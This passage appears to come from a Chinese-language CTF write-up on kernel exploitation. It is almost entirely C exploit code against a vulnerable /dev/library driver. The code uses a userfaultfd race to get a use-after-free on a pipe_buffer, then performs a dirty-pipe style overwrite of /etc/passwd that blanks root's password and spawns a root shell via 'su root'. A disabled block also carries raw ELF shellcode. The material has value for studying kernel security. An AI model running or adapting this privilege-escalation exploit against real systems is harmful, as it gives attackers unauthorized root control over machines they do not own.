                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
                if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
                if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);

                puts("[+] Now in userfaultfd handler1");
                /* splice offset 1: the merged write later lands at file offset 2 */
                uint64_t offset = 1;
                evil.flags = 0x10;
                memcpy(copy_src, &evil, sizeof(struct pipe_buffer));
                dele_all();
                if (pipe(pipe_fd[1]) < 0) err_exit("pipe");
                if (splice(attack_fd, &offset, pipe_fd[1][1], NULL, 1, 0) < 0)
                        err_exit("splice");

                uffdio_copy.src = (long long)copy_src;
                uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
        }
}

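/*
 * Exploit driver: two userfaultfd-stalled ioctls turn the remove_all() race
 * into a UAF read (leak a pipe_buffer) and a UAF write (put it back with the
 * CAN_MERGE flag set); a plain write() into the second pipe then lands in
 * ATTACK_FILE's page cache (dirty-pipe style). The final `su root` relies on
 * /bin/busybox being setuid in this environment (see the write-up).
 *
 * Fixes over the original: the pipe write used sizeof() on a char pointer
 * (8 bytes by accident), its result was unchecked, and two locals were unused.
 */
int main(int argc, char** argv, char** envp)
{
        char *uffd_buf0, *uffd_buf1;
        pthread_t thr0, thr1;
        (void)argc;
        (void)argv;
        (void)envp;

        bind_core(0);
        fd = open("/dev/library", O_RDONLY);
        if (fd < 0) err_exit("open /dev/library");

        attack_fd = open(ATTACK_FILE, O_RDONLY);
        if (attack_fd < 0) err_exit("open " ATTACK_FILE);

        /* Pages that are never touched before the ioctl, so the kernel's
         * first access inside copy_to_user/copy_from_user faults into uffd. */
        uffd_buf0 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
        uffd_buf1 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
        if (uffd_buf0 == MAP_FAILED || uffd_buf1 == MAP_FAILED) err_exit("mmap for uffd");

        register_userfaultfd(&thr0, uffd_buf0, 0x1000, handler0);
        register_userfaultfd(&thr1, uffd_buf1, 0x1000, handler1);

        /* UAF read: show() stalls in copy_to_user; handler0 frees book 0 and
         * reclaims its slot with a pipe, so the "description" read back is a
         * live pipe_buffer. */
        add(0);
        show(0, uffd_buf0);

        memcpy(&evil, uffd_buf0, sizeof(struct pipe_buffer));
        binary_dump("pipe_buffer", &evil, sizeof(struct pipe_buffer));

        /* UAF write: edit() stalls in copy_from_user; handler1 frees book 1,
         * reclaims it with pipe_fd[1] (first buffer spliced from ATTACK_FILE)
         * and resumes the copy with the leaked pipe_buffer, flags = 0x10. */
        add(1);
        edit(1, uffd_buf1);

#if 0
        /* Variant for ATTACK_FILE=/bin/busybox: an ELF payload minus its first
         * byte. The handlers splice one byte at file offset 1, so the merged
         * write starts at file offset 2, whereas this payload expects to start
         * at offset 1 — a likely reason the variant did not work for the
         * author (unverified). Kept for reference only. */
        unsigned char elfcode[] = {
            /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
                0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
                0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                0x68, 0x60, 0x66, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01, 0x01, 0x01,
                0x48, 0xb8, 0x2f, 0x72, 0x6f, 0x6f, 0x74, 0x2f, 0x66, 0x6c, 0x50, 0x6a,
                0x02, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff,
                0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f,
                0x99, 0x0f, 0x05, 0xEB
        };
        write(pipe_fd[1][1], elfcode, sizeof(elfcode));
#endif

        /* /etc/passwd: assuming the usual "root:x:0:0:root:/root:/bin/sh"
         * first line, the merged write starts at file offset 2 (splice offset
         * 1 + one byte), so these 8 bytes replace "ot:x:0:0" with "ot::00:0":
         * empty password, uid "00" (still 0), same length, rest of the line
         * untouched. This is exactly what the original's accidental 8-byte
         * write produced; the length is now explicit and the result checked. */
        static const char patch[] = "ot::00:0";
        ssize_t n = write(pipe_fd[1][1], patch, sizeof(patch) - 1);
        if (n != (ssize_t)(sizeof(patch) - 1)) err_exit("write to pipe");

        puts("[+] Please execute 'su root' to get root shell");
        system("su root");

        return 0;
}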

效果如下:
在这里插入图片描述
这里的利用方式其实还有很多,可以选择打 tty_struct 结构体,或者劫持 pipe_buffer 打劫持程序执行流,但是这时得泄漏堆地址

